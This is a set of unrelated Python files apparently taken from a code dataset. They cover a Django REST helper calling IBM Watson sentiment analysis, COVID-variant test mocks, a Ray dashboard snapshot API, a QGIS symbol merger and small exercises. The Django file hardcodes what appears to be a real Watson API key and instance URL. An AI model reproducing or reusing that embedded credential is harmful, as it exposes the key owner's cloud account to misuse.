unittest.main()\n","sub_path":"pir_client/tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":2788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"496849475","text":"import requests\nimport json\nfrom .models import CarDealer, DealerReview\nfrom requests.auth import HTTPBasicAuth\n\n\n# Create a `get_request` to make HTTP GET requests\ndef get_request(url, **kwargs):\n try:\n api_key = None\n if 'api_key' in kwargs:\n params = {\n 'text': kwargs['text'],\n 'version': '2021-03-25',\n 'features': 'sentiment',\n 'return_analyzed_text': True\n }\n api_key = kwargs['api_key']\n response = requests.get(url, headers={'Content-Type':'application/json'}, params=params, auth=HTTPBasicAuth('apikey', api_key))\n else:\n response = requests.get(url, headers={'Content-Type':'application/json'}, params=kwargs)\n status_code = response.status_code\n if status_code == 200:\n json_data = json.loads(response.text)\n return json_data\n else:\n print('get_requestResponse Status Code = ', status_code)\n return None\n except Exception as e:\n print('Error occurred', e)\n return None\n\n# Create a `post_request` to make HTTP POST requests\ndef post_request(url, json_payload, **kwargs):\n try:\n headers = { 'Content-Type': 'application/json'}\n response= requests.request(\"POST\", url, headers=headers, data=json_payload)\n\n status_code = response.status_code\n if status_code == 200:\n json_data = json.loads(response.text)\n return json_data\n else:\n print('Response Status Code = ', status_code)\n return None\n except Exception as e:\n print('Error occurred', e)\n return None\n\n# Create a get_dealers_from_cf method to get dealers from a cloud function\ndef get_dealers_from_cf(url, **kwargs):\n results = []\n # Call get_request with a URL parameter\n json_result = get_request(url)\n if json_result:\n # Get the row list in JSON as dealers\n\n dealers = json_result[\"entries\"]\n # For each dealer object\n for dealer in dealers:\n # Create a CarDealer object with values in `doc` object\n dealer_obj = CarDealer(address=dealer[\"address\"], city=dealer[\"city\"], full_name=dealer[\"full_name\"],\n id=dealer[\"id\"], lat=dealer[\"lat\"], long=dealer[\"long\"],\n short_name=dealer[\"short_name\"],\n st=dealer[\"st\"], zip=dealer[\"zip\"])\n results.append(dealer_obj)\n\n return results\n\n# Create a get_dealer_reviews_from_cf method to get reviews by dealer id from a cloud function\ndef get_dealer_reviews_from_cf(url):\n results=[]\n # call get_request with a URL parameter\n json_result = get_request(url)\n if json_result:\n reviews = json_result[\"review\"]\n for review in reviews:\n try:\n Sentiment=analyze_review_sentiments(review[\"review\"])\n \n except:\n Sentiment=\"neutral\"\n \n\n if review[\"purchase\"]==True:\n review_obj = DealerReview(id=review[\"id\"],dealership=review[\"dealership\"],name=review[\"name\"],purchase=review[\"purchase\"],\n review=review[\"review\"],purchase_date=review[\"purchase_date\"],car_make=review[\"car_make\"],car_model=review[\"car_model\"],\n car_year=review[\"car_year\"], sentiment=Sentiment)\n else:\n review_obj = DealerReview(id=review[\"id\"],dealership=review[\"dealership\"],name=review[\"name\"],purchase=review[\"purchase\"],\n review=review[\"review\"],purchase_date=review[\"review_time\"],car_make=\"NONE\",car_model=\"NONE\",\n car_year=\"NONE\", sentiment=Sentiment)\n results.append(review_obj)\n return results\n\n# Create an `analyze_review_sentiments` method to call Watson NLU and analyze text\ndef analyze_review_sentiments(text):\n kwargs = {\n 'text': text,\n 'api_key': \"z43HCKRN1IlZiUWnzyZoo-FNTS3C8OWHCNSnYT7fzhTk\"\n }\n url = \"https://api.eu-gb.natural-language-understanding.watson.cloud.ibm.com/instances/2e32f983-6289-46d9-82b8-608e601d2005\"\n result = get_request(url + '/v1/analyze', **kwargs)\n return result['sentiment']['document']['label']\n\n","sub_path":"server/djangoapp/restapis.py","file_name":"restapis.py","file_ext":"py","file_size_in_byte":4242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"21462908","text":"\n\nfrom xai.brain.wordbase.nouns._enchantress import _ENCHANTRESS\n\n#calss header\nclass _ENCHANTRESSES(_ENCHANTRESS, ):\n\tdef __init__(self,): \n\t\t_ENCHANTRESS.__init__(self)\n\t\tself.name = \"ENCHANTRESSES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"enchantress\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_enchantresses.py","file_name":"_enchantresses.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"641064372","text":"import numpy as np\nfrom itertools import combinations\nfrom typing import Union\nfrom faker import Faker\nfrom sqlalchemy.orm import Session\n\nfrom covigator import MISSENSE_VARIANT, INFRAME_INSERTION, INFRAME_DELETION\nfrom covigator.database.model import SampleEna, DataSource, JobStatus, Log, CovigatorModule, Variant, \\\n VariantCooccurrence, VariantType, SampleCovid19Portal, VariantCovid19Portal\nfrom Bio.Alphabet.IUPAC import IUPACData\n\nfrom covigator.database.queries import Queries\n\nMOCKED_GENES = [\"S\", \"N\", \"E\", \"M\", \"ORF3a\", \"ORF1ab\", \"ORF7b\", \"ORF10\", \"ORF6\", \"ORF8\", \"ORF7a\"]\nMOCKED_DOMAINS = [\"CoV_S2\", \"bCoV_S1_RBD\", \"bCoV_S1_N\", \"CoV_S1_C\"]\nMOCKED_LINEAGES = [\"A\", \"B\", \"C\", \"D\", \"E\", \"F\", \"\"]\n\n\ndef get_mocked_variant(faker: Faker, chromosome=None, gene_name=None, source=DataSource.ENA.name, session: Session = None) -> Variant:\n\n if gene_name is None:\n gene_name = faker.random_choices(MOCKED_GENES, length=1)[0]\n domain_name = faker.random_choices(MOCKED_DOMAINS, length=1)[0]\n annotation = faker.random_choices(\n [MISSENSE_VARIANT, INFRAME_DELETION, INFRAME_INSERTION], length=1)[0] #SYNONYMOUS_VARIANT\n\n if session:\n queries = Queries(session=session)\n gene = queries.get_gene(gene_name=gene_name)\n start = gene.start\n end = gene.end\n else:\n start = 1\n end = 30000\n\n klass = Queries.get_variant_klass(source)\n reference = faker.random_choices(list(IUPACData.unambiguous_dna_letters), length=1)[0]\n alternate = faker.random_choices(list(IUPACData.unambiguous_dna_letters), length=1)[0]\n variant = klass(\n chromosome=chromosome if chromosome else faker.bothify(text=\"chr##\"),\n position=faker.random_int(min=start, max=end),\n reference=reference,\n # TODO: reference and alternate could be equal!\n alternate=alternate,\n variant_type=VariantType.SNV,\n gene_name=gene_name,\n hgvs_p=\"p.{}{}{}\".format(\n faker.random_choices(list(IUPACData.protein_letters_1to3.values()), length=1)[0],\n faker.random_int(min=1, max=500),\n faker.random_choices(list(IUPACData.protein_letters_1to3.values()), length=1)[0]\n ),\n annotation=annotation,\n annotation_highest_impact=annotation,\n pfam_name=domain_name,\n length=len(reference) - len(alternate)\n )\n variant.variant_id = variant.get_variant_id()\n return variant\n\n\ndef get_mocked_variant_observation(\n sample: Union[SampleEna, SampleCovid19Portal], variant: Union[Variant, VariantCovid19Portal], faker=Faker()):\n\n klass = Queries.get_variant_observation_klass(\n DataSource.ENA.name if isinstance(sample, SampleEna) else DataSource.COVID19_PORTAL.name)\n return klass(\n sample=sample.run_accession if sample else faker.unique.uuid4(),\n variant_id=variant.variant_id,\n chromosome=variant.chromosome,\n position=variant.position,\n reference=variant.reference,\n alternate=variant.alternate,\n variant_type=VariantType.SNV,\n annotation=variant.annotation,\n annotation_highest_impact=variant.annotation_highest_impact,\n gene_name=variant.gene_name,\n pfam_name=variant.pfam_name,\n date=faker.date_time(),\n hgvs_p=variant.hgvs_p,\n length=len(variant.reference) - len(variant.alternate)\n )\n\n\ndef get_mocked_sample(faker: Faker, source: DataSource =DataSource.ENA, job_status=JobStatus.FINISHED) -> Union[SampleEna]:\n identifier = faker.unique.uuid4()\n sample = SampleEna(\n run_accession=identifier,\n collection_date=faker.date_time(),\n country=faker.country(),\n fastq_ftp=faker.uri(),\n fastq_md5=faker.md5(),\n num_fastqs=1,\n status=job_status,\n pangolin_lineage=faker.random_choices(MOCKED_LINEAGES, length=1)[0]\n )\n return sample\n\n\ndef get_mocked_ena_sample(faker: Faker, job_status=JobStatus.FINISHED) -> SampleEna:\n return get_mocked_sample(faker=faker, source=DataSource.ENA, job_status=job_status)\n\n\ndef get_mocked_log(faker: Faker, source: DataSource = None, module: CovigatorModule = None) -> Log:\n return Log(\n start=faker.date_time(),\n end=faker.date_time(),\n source=source if source else faker.random_choices((DataSource.ENA, DataSource.GISAID), length=1)[0],\n module=module if module else faker.random_choices((CovigatorModule.ACCESSOR, CovigatorModule.PROCESSOR),\n length=1)[0],\n has_error=faker.boolean(),\n processed=faker.random_digit(),\n data={\"included\": faker.random_digit(),\n \"excluded\": {\"this\": faker.random_digit(), \"that\": faker.random_digit()}}\n )\n\n\ndef get_mocked_variant_cooccurrence(faker: Faker, variant_one: Variant, variant_two: Variant) -> VariantCooccurrence:\n if variant_one.position <= variant_two.position:\n cooccurrence = VariantCooccurrence(\n variant_id_one=variant_one.variant_id,\n variant_id_two=variant_two.variant_id,\n count=faker.random_int(min=1, max=10)\n )\n else:\n cooccurrence = VariantCooccurrence(\n variant_id_two=variant_one.variant_id,\n variant_id_one=variant_two.variant_id,\n count=faker.random_int(min=1, max=10)\n )\n return cooccurrence\n\n\ndef mock_samples_and_variants(faker, session: Session, num_samples=10, source = DataSource.ENA):\n\n existing_variants = set()\n samples = mock_samples(faker=faker, session=session, num_samples=num_samples, source=source)\n # introduce some not finished samples, which happen to have variants too...\n failed_samples = mock_samples(faker=faker, session=session, num_samples=num_samples, source=source,\n job_status=JobStatus.FAILED_PROCESSING)\n # introduce a variant that is shared by all samples (eg: like 23403:A>G)\n shared_variant = get_mocked_variant(faker=faker, source=source.name, session=session)\n for sample in samples + failed_samples:\n variants = [get_mocked_variant(faker=faker, source=source.name, session=session) for _ in range(9)] + \\\n [shared_variant]\n # NOTE: this aims at removing potentially repeated variants\n variants_dict = {v.variant_id: v for v in variants}\n variants = variants_dict.values()\n new_variants = list(filter(lambda x: x.variant_id not in existing_variants, variants))\n session.add_all(new_variants)\n session.commit()\n existing_variants.update([v.variant_id for v in variants])\n\n variants_observations = [get_mocked_variant_observation(faker=faker, variant=v, sample=sample)\n for v in variants]\n session.add_all(variants_observations)\n session.commit()\n\n\ndef mock_samples(faker, session: Session, num_samples=10, job_status=JobStatus.FINISHED, source=DataSource.ENA):\n samples = []\n for _ in range(num_samples):\n sample = get_mocked_ena_sample(faker=faker, job_status=job_status)\n samples.append(sample)\n\n session.add_all(samples)\n session.commit()\n return samples\n\n\ndef mock_cooccurrence_matrix(faker, session: Session):\n # add some variants belonging to two genes\n chromosome = \"fixed_chromosome\"\n gene_name = \"S\"\n variants = [get_mocked_variant(faker=faker, chromosome=chromosome, gene_name=gene_name) for _ in range(5)]\n other_gene_name = \"N\"\n other_variants = [get_mocked_variant(faker=faker, chromosome=chromosome, gene_name=other_gene_name) for _\n in range(5)]\n session.add_all(variants + other_variants)\n session.commit()\n # adds some cooccurrences\n cooccurrences = []\n other_cooccurrences = []\n variants_to_sample = {\"{}-{}\".format(v1.hgvs_p, v2.hgvs_p): (v1, v2) for v1, v2 in\n list(combinations(variants, 2))}\n other_variants_to_sample = {\"{}-{}\".format(v1.hgvs_p, v2.hgvs_p): (v1, v2) for v1, v2 in\n list(combinations(other_variants, 2))}\n combined_variants_to_sample = {\"{}-{}\".format(v1.hgvs_p, v2.hgvs_p): (v1, v2) for v1, v2 in\n list(zip(variants, other_variants))}\n for variant in variants + other_variants:\n cooccurrences.append(get_mocked_variant_cooccurrence(faker, variant, variant))\n for (variant_one, variant_two) in [variants_to_sample.get(k) for k in\n np.random.choice(list(variants_to_sample.keys()), 5, replace=False)]:\n cooccurrences.append(get_mocked_variant_cooccurrence(faker, variant_one, variant_two))\n for (variant_one, variant_two) in [other_variants_to_sample.get(k) for k in\n np.random.choice(list(other_variants_to_sample.keys()), 5, replace=False)]:\n other_cooccurrences.append(get_mocked_variant_cooccurrence(faker, variant_one, variant_two))\n for (variant_one, variant_two) in [combined_variants_to_sample.get(k) for k in\n np.random.choice(list(combined_variants_to_sample.keys()), 5,\n replace=False)]:\n other_cooccurrences.append(get_mocked_variant_cooccurrence(faker, variant_one, variant_two))\n session.add_all(cooccurrences + other_cooccurrences)\n session.commit()\n\n # add some samples to compute the frequency right\n mock_samples(faker=faker, session=session, num_samples=10)\n\n return other_variants, variants\n","sub_path":"covigator/tests/unit_tests/mocked.py","file_name":"mocked.py","file_ext":"py","file_size_in_byte":9533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"337505806","text":"# coding=utf-8\n\n\ndef task(keys, vals):\n \"\"\"\n Функция принимает два списка/кортежа ключей и значений:\n (k1, k2, ..., kn) и (v1, v2, ..., vm).\n\n Вернуть словарь вида {k1: v1, k2: v2, ...}.\n Если ключей больше чем значений, лишним ключам назначаются значения None.\n\n Примеры:\n >>> task(['a', 'b', 'c'], [1, 2, 3])\n {'a': 1, 'b': 2, 'c': 3}\n\n >>> task(['a', 'b', 'c', 'd', 'e'], [1, 2, 3])\n {'a': 1, 'b': 2, 'c': 3, 'd': None, 'e': None}\n \"\"\"\n # BEGIN\n none = (None,)\n cc = len(keys)\n dd = len(vals)\n if cc > dd:\n ee = cc - dd\n vals.extend(none * ee)\n new_dict = dict(zip(keys, vals))\n else:\n new_dict = dict(zip(keys, vals))\n return new_dict\n # END\n\n\n","sub_path":"python/Hexlet/Practice2/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"517027422","text":"import asyncio\nimport concurrent.futures\nfrom datetime import datetime\nimport enum\nimport logging\nimport json\nimport os\nfrom typing import Dict, Optional\n\nimport aiohttp.web\nfrom pydantic import BaseModel, Extra, Field, validator\n\nimport ray\nfrom ray.dashboard.consts import RAY_CLUSTER_ACTIVITY_HOOK\nimport ray.dashboard.optional_utils as dashboard_optional_utils\nimport ray.dashboard.utils as dashboard_utils\nfrom ray._private.storage import _load_class\nfrom ray.core.generated import gcs_pb2, gcs_service_pb2, gcs_service_pb2_grpc\nfrom ray.dashboard.modules.job.common import JOB_ID_METADATA_KEY, JobInfoStorageClient\n\nfrom ray.job_submission import JobInfo\nfrom ray.runtime_env import RuntimeEnv\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\nroutes = dashboard_optional_utils.ClassMethodRouteTable\n\nSNAPSHOT_API_TIMEOUT_SECONDS = 30\n\n\nclass RayActivityStatus(str, enum.Enum):\n ACTIVE = \"ACTIVE\"\n INACTIVE = \"INACTIVE\"\n ERROR = \"ERROR\"\n\n\nclass RayActivityResponse(BaseModel, extra=Extra.allow):\n \"\"\"\n Pydantic model used to inform if a particular Ray component can be considered\n active, and metadata about observation.\n \"\"\"\n\n is_active: RayActivityStatus = Field(\n ...,\n description=(\n \"Whether the corresponding Ray component is considered active or inactive, \"\n \"or if there was an error while collecting this observation.\"\n ),\n )\n reason: Optional[str] = Field(\n None, description=\"Reason if Ray component is considered active or errored.\"\n )\n timestamp: float = Field(\n ...,\n description=(\n \"Timestamp of when this observation about the Ray component was made. \"\n \"This is in the format of seconds since unix epoch.\"\n ),\n )\n last_activity_at: Optional[float] = Field(\n None,\n description=(\n \"Timestamp when last actvity of this Ray component finished in format of \"\n \"seconds since unix epoch. This field does not need to be populated \"\n \"for Ray components where it is not meaningful.\"\n ),\n )\n\n @validator(\"reason\", always=True)\n def reason_required(cls, v, values, **kwargs):\n if \"is_active\" in values and values[\"is_active\"] != RayActivityStatus.INACTIVE:\n if v is None:\n raise ValueError(\n 'Reason is required if is_active is \"active\" or \"error\"'\n )\n return v\n\n\nclass APIHead(dashboard_utils.DashboardHeadModule):\n def __init__(self, dashboard_head):\n super().__init__(dashboard_head)\n self._gcs_job_info_stub = None\n self._gcs_actor_info_stub = None\n self._dashboard_head = dashboard_head\n self._gcs_aio_client = dashboard_head.gcs_aio_client\n self._job_info_client = None\n # For offloading CPU intensive work.\n self._thread_pool = concurrent.futures.ThreadPoolExecutor(\n max_workers=2, thread_name_prefix=\"api_head\"\n )\n\n @routes.get(\"/api/actors/kill\")\n async def kill_actor_gcs(self, req) -> aiohttp.web.Response:\n actor_id = req.query.get(\"actor_id\")\n force_kill = req.query.get(\"force_kill\", False) in (\"true\", \"True\")\n no_restart = req.query.get(\"no_restart\", False) in (\"true\", \"True\")\n if not actor_id:\n return dashboard_optional_utils.rest_response(\n success=False, message=\"actor_id is required.\"\n )\n\n request = gcs_service_pb2.KillActorViaGcsRequest()\n request.actor_id = bytes.fromhex(actor_id)\n request.force_kill = force_kill\n request.no_restart = no_restart\n await self._gcs_actor_info_stub.KillActorViaGcs(\n request, timeout=SNAPSHOT_API_TIMEOUT_SECONDS\n )\n\n message = (\n f\"Force killed actor with id {actor_id}\"\n if force_kill\n else f\"Requested actor with id {actor_id} to terminate. \"\n + \"It will exit once running tasks complete\"\n )\n\n return dashboard_optional_utils.rest_response(success=True, message=message)\n\n @routes.get(\"/api/snapshot\")\n async def snapshot(self, req):\n timeout = req.query.get(\"timeout\", None)\n if timeout and timeout.isdigit():\n timeout = int(timeout)\n else:\n timeout = SNAPSHOT_API_TIMEOUT_SECONDS\n\n actor_limit = int(req.query.get(\"actor_limit\", \"1000\"))\n (job_info, job_submission_data, actor_data) = await asyncio.gather(\n self.get_job_info(timeout),\n self.get_job_submission_info(timeout),\n self.get_actor_info(actor_limit, timeout),\n )\n snapshot = {\n \"jobs\": job_info,\n \"job_submission\": job_submission_data,\n \"actors\": actor_data,\n \"session_name\": self._dashboard_head.session_name,\n \"ray_version\": ray.__version__,\n \"ray_commit\": ray.__commit__,\n }\n return dashboard_optional_utils.rest_response(\n success=True, message=\"hello\", snapshot=snapshot\n )\n\n @routes.get(\"/api/component_activities\")\n async def get_component_activities(self, req) -> aiohttp.web.Response:\n timeout = req.query.get(\"timeout\", None)\n if timeout and timeout.isdigit():\n timeout = int(timeout)\n else:\n timeout = SNAPSHOT_API_TIMEOUT_SECONDS\n\n # Get activity information for driver\n driver_activity_info = await self._get_job_activity_info(timeout=timeout)\n resp = {\"driver\": dict(driver_activity_info)}\n\n if RAY_CLUSTER_ACTIVITY_HOOK in os.environ:\n try:\n cluster_activity_callable = _load_class(\n os.environ[RAY_CLUSTER_ACTIVITY_HOOK]\n )\n external_activity_output = cluster_activity_callable()\n assert isinstance(external_activity_output, dict), (\n f\"Output of hook {os.environ[RAY_CLUSTER_ACTIVITY_HOOK]} \"\n \"should be Dict[str, RayActivityResponse]. Got \"\n f\"output: {external_activity_output}\"\n )\n for component_type in external_activity_output:\n try:\n component_activity_output = external_activity_output[\n component_type\n ]\n # Parse and validate output to type RayActivityResponse\n component_activity_output = RayActivityResponse(\n **dict(component_activity_output)\n )\n resp[component_type] = dict(component_activity_output)\n except Exception as e:\n logger.exception(\n f\"Failed to get activity status of {component_type} \"\n f\"from user hook {os.environ[RAY_CLUSTER_ACTIVITY_HOOK]}.\"\n )\n resp[component_type] = {\n \"is_active\": RayActivityStatus.ERROR,\n \"reason\": repr(e),\n \"timestamp\": datetime.now().timestamp(),\n }\n except Exception as e:\n logger.exception(\n \"Failed to get activity status from user \"\n f\"hook {os.environ[RAY_CLUSTER_ACTIVITY_HOOK]}.\"\n )\n resp[\"external_component\"] = {\n \"is_active\": RayActivityStatus.ERROR,\n \"reason\": repr(e),\n \"timestamp\": datetime.now().timestamp(),\n }\n\n return aiohttp.web.Response(\n text=json.dumps(resp),\n content_type=\"application/json\",\n status=aiohttp.web.HTTPOk.status_code,\n )\n\n async def _get_job_activity_info(self, timeout: int) -> RayActivityResponse:\n # Returns if there is Ray activity from drivers (job).\n # Drivers in namespaces that start with _ray_internal_ are not\n # considered activity.\n # This includes the _ray_internal_dashboard job that gets automatically\n # created with every cluster\n try:\n request = gcs_service_pb2.GetAllJobInfoRequest()\n reply = await self._gcs_job_info_stub.GetAllJobInfo(\n request, timeout=timeout\n )\n\n num_active_drivers = 0\n latest_job_end_time = 0\n for job_table_entry in reply.job_info_list:\n is_dead = bool(job_table_entry.is_dead)\n in_internal_namespace = job_table_entry.config.ray_namespace.startswith(\n \"_ray_internal_\"\n )\n latest_job_end_time = (\n max(latest_job_end_time, job_table_entry.end_time)\n if job_table_entry.end_time\n else latest_job_end_time\n )\n if not is_dead and not in_internal_namespace:\n num_active_drivers += 1\n\n current_timestamp = datetime.now().timestamp()\n # Latest job end time must be before or equal to the current timestamp.\n # Job end times may be provided in epoch milliseconds. Check if this\n # is true, and convert to seconds\n if latest_job_end_time > current_timestamp:\n latest_job_end_time = latest_job_end_time / 1000\n assert current_timestamp >= latest_job_end_time, (\n f\"Most recent job end time {latest_job_end_time} must be \"\n f\"before or equal to the current timestamp {current_timestamp}\"\n )\n\n is_active = (\n RayActivityStatus.ACTIVE\n if num_active_drivers > 0\n else RayActivityStatus.INACTIVE\n )\n return RayActivityResponse(\n is_active=is_active,\n reason=f\"Number of active drivers: {num_active_drivers}\"\n if num_active_drivers\n else None,\n timestamp=current_timestamp,\n # If latest_job_end_time == 0, no jobs have finished yet so don't\n # populate last_activity_at\n last_activity_at=latest_job_end_time if latest_job_end_time else None,\n )\n except Exception as e:\n logger.exception(\"Failed to get activity status of Ray drivers.\")\n return RayActivityResponse(\n is_active=RayActivityStatus.ERROR,\n reason=repr(e),\n timestamp=datetime.now().timestamp(),\n )\n\n async def _get_job_info(self, metadata: Dict[str, str]) -> Optional[JobInfo]:\n # If a job submission ID has been added to a job, the status is\n # guaranteed to be returned.\n job_submission_id = metadata.get(JOB_ID_METADATA_KEY)\n return await self._job_info_client.get_info(job_submission_id)\n\n async def get_job_info(self, timeout: int = SNAPSHOT_API_TIMEOUT_SECONDS):\n \"\"\"Return info for each job. Here a job is a Ray driver.\"\"\"\n request = gcs_service_pb2.GetAllJobInfoRequest()\n reply = await self._gcs_job_info_stub.GetAllJobInfo(request, timeout=timeout)\n\n jobs = {}\n for job_table_entry in reply.job_info_list:\n job_id = job_table_entry.job_id.hex()\n metadata = dict(job_table_entry.config.metadata)\n config = {\n \"namespace\": job_table_entry.config.ray_namespace,\n \"metadata\": metadata,\n \"runtime_env\": RuntimeEnv.deserialize(\n job_table_entry.config.runtime_env_info.serialized_runtime_env\n ),\n }\n info = await self._get_job_info(metadata)\n entry = {\n \"status\": None if info is None else info.status,\n \"status_message\": None if info is None else info.message,\n \"is_dead\": job_table_entry.is_dead,\n \"start_time\": job_table_entry.start_time,\n \"end_time\": job_table_entry.end_time,\n \"config\": config,\n }\n jobs[job_id] = entry\n\n return jobs\n\n async def get_job_submission_info(\n self, timeout: int = SNAPSHOT_API_TIMEOUT_SECONDS\n ):\n \"\"\"Info for Ray job submission. Here a job can have 0 or many drivers.\"\"\"\n\n jobs = {}\n fetched_jobs = await self._job_info_client.get_all_jobs(timeout)\n for (\n job_submission_id,\n job_info,\n ) in fetched_jobs.items():\n if job_info is not None:\n entry = {\n \"job_submission_id\": job_submission_id,\n \"status\": job_info.status,\n \"message\": job_info.message,\n \"error_type\": job_info.error_type,\n \"start_time\": job_info.start_time,\n \"end_time\": job_info.end_time,\n \"metadata\": job_info.metadata,\n \"runtime_env\": job_info.runtime_env,\n \"entrypoint\": job_info.entrypoint,\n }\n jobs[job_submission_id] = entry\n return jobs\n\n async def get_actor_info(\n self, limit: int = 1000, timeout: int = SNAPSHOT_API_TIMEOUT_SECONDS\n ):\n # TODO (Alex): GCS still needs to return actors from dead jobs.\n request = gcs_service_pb2.GetAllActorInfoRequest()\n request.show_dead_jobs = True\n request.limit = limit\n reply = await self._gcs_actor_info_stub.GetAllActorInfo(\n request, timeout=timeout\n )\n actors = {}\n for actor_table_entry in reply.actor_table_data:\n actor_id = actor_table_entry.actor_id.hex()\n runtime_env = json.loads(actor_table_entry.serialized_runtime_env)\n entry = {\n \"job_id\": actor_table_entry.job_id.hex(),\n \"state\": gcs_pb2.ActorTableData.ActorState.Name(\n actor_table_entry.state\n ),\n \"name\": actor_table_entry.name,\n \"namespace\": actor_table_entry.ray_namespace,\n \"runtime_env\": runtime_env,\n \"start_time\": actor_table_entry.start_time,\n \"end_time\": actor_table_entry.end_time,\n \"is_detached\": actor_table_entry.is_detached,\n \"resources\": dict(actor_table_entry.required_resources),\n \"actor_class\": actor_table_entry.class_name,\n \"current_worker_id\": actor_table_entry.address.worker_id.hex(),\n \"current_raylet_id\": actor_table_entry.address.raylet_id.hex(),\n \"ip_address\": actor_table_entry.address.ip_address,\n \"port\": actor_table_entry.address.port,\n \"metadata\": dict(),\n }\n actors[actor_id] = entry\n\n return actors\n\n async def run(self, server):\n self._gcs_job_info_stub = gcs_service_pb2_grpc.JobInfoGcsServiceStub(\n self._dashboard_head.aiogrpc_gcs_channel\n )\n self._gcs_actor_info_stub = gcs_service_pb2_grpc.ActorInfoGcsServiceStub(\n self._dashboard_head.aiogrpc_gcs_channel\n )\n # Lazily constructed because dashboard_head's gcs_aio_client\n # is lazily constructed\n if not self._job_info_client:\n self._job_info_client = JobInfoStorageClient(\n self._dashboard_head.gcs_aio_client\n )\n\n @staticmethod\n def is_minimal_module():\n return False\n","sub_path":"dashboard/modules/snapshot/snapshot_head.py","file_name":"snapshot_head.py","file_ext":"py","file_size_in_byte":15619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"203225084","text":"#!/env/python\n#\n# merge-symbols: merge geologic symbols into a single library. \n#\n# (c) 2019 Alessandro Frigeri, Istituto di Astrofisica e Planetologia Spaziali - INAF - Rome\n#\n\nimport xml.etree.ElementTree as ET\nfrom xml.etree.ElementTree import Element, SubElement, Comment, ElementTree\nimport os,sys\nfrom xml.dom import minidom\nimport glob\nfrom pytablewriter import MarkdownTableWriter\nimport datetime\n\nwriter = MarkdownTableWriter()\nstatus_header = \"# Table of symbols, updated \"+datetime.date.today().strftime(\"%B %d, %Y\")+\"\\n\"\nwriter.table_name = \"\"\nwriter.headers = [\"Authority\", \"code\", \"description\", \"notes\"]\nwriter.value_matrix = []\n\ndef indent(elem, level=0):\n i = \"\\n\" + level*\" \"\n j = \"\\n\" + (level-1)*\" \"\n if len(elem):\n if not elem.text or not elem.text.strip():\n elem.text = i + \" \"\n if not elem.tail or not elem.tail.strip():\n elem.tail = i\n for subelem in elem:\n indent(subelem, level+1)\n if not elem.tail or not elem.tail.strip():\n elem.tail = j\n else:\n if level and (not elem.tail or not elem.tail.strip()):\n elem.tail = j\n return elem\n\ndef name_parser(name):\n '''\n name convention:\n \n [name or id] : [ description ]\n '''\n return name.split(':')\n\nsrcdir = sys.argv[1]\ndst = sys.argv[2] \n\ntop = ET.Element('qgis_style', version=\"1\")\ncomment = ET.Comment('geologic symbols for QGis')\ntop.append(comment)\n\nsymbols = ET.SubElement(top, 'symbols')\n\ncount_dict = {}\n\nstatus_file = open('../STATUS.md','w') \n\nfor rootdir, dirs, files in os.walk( srcdir ): \n for filename in files:\n if filename.endswith(\".xml\"): \n xmlfile = os.path.join(rootdir, filename)\n auth = os.path.dirname( xmlfile ).split('/')[-1]\n if auth not in count_dict.keys():\n count_dict[auth] = 0\n tree = ET.parse( xmlfile )\n root = tree.getroot()\n if root.findall(\"./symbols/symbol\"):\n for symbol in root.findall(\"./symbols/symbol\"): \n symbol.attrib['tags'] = auth+',geology'\n n = (symbol.attrib['name'])\n print(n)\n c,d = name_parser( n )\n symbols.append(symbol)\n count_dict[auth] += 1\n writer.value_matrix.append([auth,str(c),d,''])\n \n if root.findall(\"./colorramps/colorramp\"):\n colorramps = ET.SubElement(top, 'colorramps')\n for colorramp in root.findall(\"./colorramps/colorramp\"):\n colorramp.attrib['tags'] = auth+',geology'\n n = colorramp.attrib['name']\n c,d = name_parser( n )\n colorramps.append(colorramp)\n count_dict[auth] += 1\n writer.value_matrix.append([auth,str(c),d,''])\n\nElementTree(indent(top)).write(dst)\nwriter.value_matrix.sort()\nwriter.write_table()\nstatus_file.write(status_header)\nstatus_file.write(\"There are:\\n\") \nfor k in count_dict.keys():\n status_file.write(\" * %d entries for %s.\\n\"%(count_dict[k],k)) \nstatus_file.write(\"\\n\") \n\nstatus_file.write(writer.dumps()) \nstatus_file.close()\nprint(count_dict)\n","sub_path":"src/scripts/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":3140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"98991782","text":"import pandas as pd\nimport sys\nimport subprocess\n\n\ndef comp_run(file_name,iterations):\n try:\n f_out = open(\"comp_f.csv\",\"w\")\n c_out = open(\"comp_c.csv\",\"w\")\n s_out = open(\"comp_s.csv\",\"w\")\n f_out.write(\"dram_module,sim_num,sim_stat,trans_1bit,trans_1word,trans_1col,trans_1row,trans_1bank,trans_nbank,trans_nrank,\"\n +\"perm_1bit,perm_1word,perm_1col,perm_1row,perm_1bank,perm_nbank,perm_nrank\\n\")\n c_out.write(\"dram_module,sim_num,sim_stat,trans_1bit,trans_1word,trans_1col,trans_1row,trans_1bank,trans_nbank,trans_nrank,\"\n +\"perm_1bit,perm_1word,perm_1col,perm_1row,perm_1bank,perm_nbank,perm_nrank\\n\")\n s_out.write(\"dram_module,sim_num,sim_stat,trans_1bit,trans_1word,trans_1col,trans_1row,trans_1bank,trans_nbank,trans_nrank,\"\n +\"perm_1bit,perm_1word,perm_1col,perm_1row,perm_1bank,perm_nbank,perm_nrank,the_straw\\n\")\n f_out.close()\n c_out.close()\n s_out.close()\n\n file_path = \"../configs/\"+file_name\n\n for i in range(0,iterations):\n subprocess.run([\"../faultsim\",\"--configfile\",file_path,\"--outfile\",\"out.txt\"])\n df = pd.read_csv(\"synop.csv\")\n dft = df.iloc[:,:17]\n dff = dft.loc[df['sim_stat'] == 2]\n dfc = dft.loc[df['sim_stat'] == 1]\n dfs = 